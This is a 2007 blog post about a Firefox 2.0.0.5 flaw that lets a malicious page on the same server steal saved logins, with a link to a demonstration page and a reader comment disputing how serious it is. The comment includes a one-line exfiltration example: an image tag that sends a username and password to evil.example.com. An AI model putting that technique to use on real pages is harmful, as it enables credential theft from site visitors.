Firefox vulnerable to username and password theft

Firefox is not having a good week.  Hot on the heels of the "Hey Mozilla: Quotes are not legal in a URL" embarrassment, a vulnerability that exposes the usernames and password of FF users has been reported that apparently affects Firefox 2.0.0.5 and earlier.

To quote Heise Security, "Firefox, if allowed, can store usernames and passwords. If you visit a login page again, the password is then entered automatically. But this means, that a second, evil page on the same server could steal those saved passwords."

Demonstration page here:
http://www.heise-security.co.uk/services/browsercheck/demos/moz/pass1.shtml?name=noam&password=noampassword#

Javascript must be enabled for the exploit to work.

This vulnerability holds a real potential for harm in the current internet environment wherein criminals are hacking into servers all over the world and inserting malicious code on legitimate Web pages - code that tries to take advantage of various security exploits affecting Firefox, Opera and IE to infect a visitor's Web browser.  It would be a simple matter for the criminals to also upload an "evil page" to a hacked server to capture usernames and passwords of FF users.

Published Mon, Jul 23 2007 15:08 by sandi

Comments

# re: Firefox vulnerable to username and password theft

Monday, July 23, 2007 3:54 PM by Dewi Morgan

Um... call me slow, but could you explain how this is any different to any other autologin software on the market?

Many many things rely on a single trusted domain. This is why, if you go to your own LiveJournal or Geocities, you are now faced with a domain called something like dewimorgan.livejournal.com: the domain is a separate thing to prevent two people sharing the same "trusted domain".

If someone has an evil script embedded into your page, and a serverside script to handle it, then you have *already lost*.

They already have all your customers' login information, and far more. For a site to get the information that you trust that site with is trivial on every browser, by design. You WANT them to have the information you want them to have.

I've heard it argued that it's hard to get the info from one doain's page to a remote server without triggering security alerts in the browser, but img src="evil.example.com/yourName/yourPass/transparent.gif" should work just fine.

Usernames and passwords are only as secure as the websites that run them. Which is generally "not very". Usernames and passwords on the web are just to help the site designers, and to make things easier for you, not to give YOU any safety or security. In the very few cases where this is not true (paypal, your bank, ebay), you should not log into those sites unless you trust that company to be able to prevent malicious scripting on its pages from stealing your details.

That applies to any JS-capable browser ever written.